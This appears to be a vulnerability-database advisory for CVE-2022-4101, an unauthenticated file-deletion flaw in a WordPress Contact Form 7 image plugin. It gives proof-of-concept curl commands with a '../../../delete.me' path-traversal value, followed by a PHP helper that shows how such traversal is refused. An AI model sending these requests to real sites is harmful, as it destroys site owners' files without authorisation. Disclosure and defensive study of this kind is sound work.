
Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion

πŸ—“οΈΒ 21 Dec 2022Β 00:00:00Reported byΒ cydaveTypeΒ 
wpexploit
Β wpexploit
πŸ‘Β 89Β Views


Related

Reporter | Title | Published
Circl | CVE-2022-4101 | 4 Apr 2025 18:36
CNNVD | WordPress plugin Images Optimize and Upload CF7 path traversal vulnerability | 16 Jan 2023 00:00
CVE | CVE-2022-4101 | 16 Jan 2023 15:37
Cvelist | CVE-2022-4101 Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion | 16 Jan 2023 15:37
NVD | CVE-2022-4101 | 16 Jan 2023 16:15
OSV | CVE-2022-4101 | 16 Jan 2023 16:15
Prion | Path traversal | 16 Jan 2023 16:15
Positive Technologies | PT-2023-13934 · WordPress · Images Optimize/Upload Cf7 | 16 Jan 2023 00:00
RedhatCVE | CVE-2022-4101 | 23 May 2025 00:31
Vulnrichment | CVE-2022-4101 Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion | 16 Jan 2023 15:37

Code

1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'
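
One way a delete handler can refuse the `file=../../../delete.me` value from step 4, shown as an added example that is not the plugin's code or its actual patch. The function name `delete_inside_dir` and the temporary directory layout are assumptions made for the demo.

```php
<?php
/**
 * Delete $userValue only if it resolves to a regular file inside $baseDir.
 * Returns true when a file was deleted, false when the request is refused.
 * Hypothetical helper: a handler would pass its own upload directory here.
 */
function delete_inside_dir(string $baseDir, string $userValue): bool
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return false; // upload directory does not exist
    }
    if (strpos($userValue, "\0") !== false) {
        return false; // null bytes are never valid in a file name
    }
    // Keep only the last path component, so directory parts are discarded.
    $name = basename(str_replace('\\', '/', $userValue));
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }
    // Resolve symlinks, then require the result to sit under the base directory.
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target === false
        || strncmp($target, $prefix, strlen($prefix)) !== 0
        || !is_file($target)) {
        return false;
    }
    return unlink($target);
}

// Constructed demo: a temp tree standing in for the blog root and upload dir.
$root    = sys_get_temp_dir() . '/cf7_demo_' . bin2hex(random_bytes(4));
$uploads = $root . '/a/b/uploads';
mkdir($uploads, 0700, true);
file_put_contents($root . '/delete.me', 'x');
file_put_contents($uploads . '/photo.jpg', 'x');

// Traversal value from step 4, then a legitimate file in the upload dir.
var_dump(delete_inside_dir($uploads, '../../../delete.me'));
var_dump(file_exists($root . '/delete.me'));
var_dump(delete_inside_dir($uploads, 'photo.jpg'));
```

The `basename()` step alone strips the `../` segments; the `realpath()` prefix comparison additionally covers a symlink inside the upload directory that points elsewhere.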


21 Dec 2022 03:23 (current)
Vulners AI Score: 1 (Low risk)
CVSS 3.1: 9.1
EPSS: 0.40818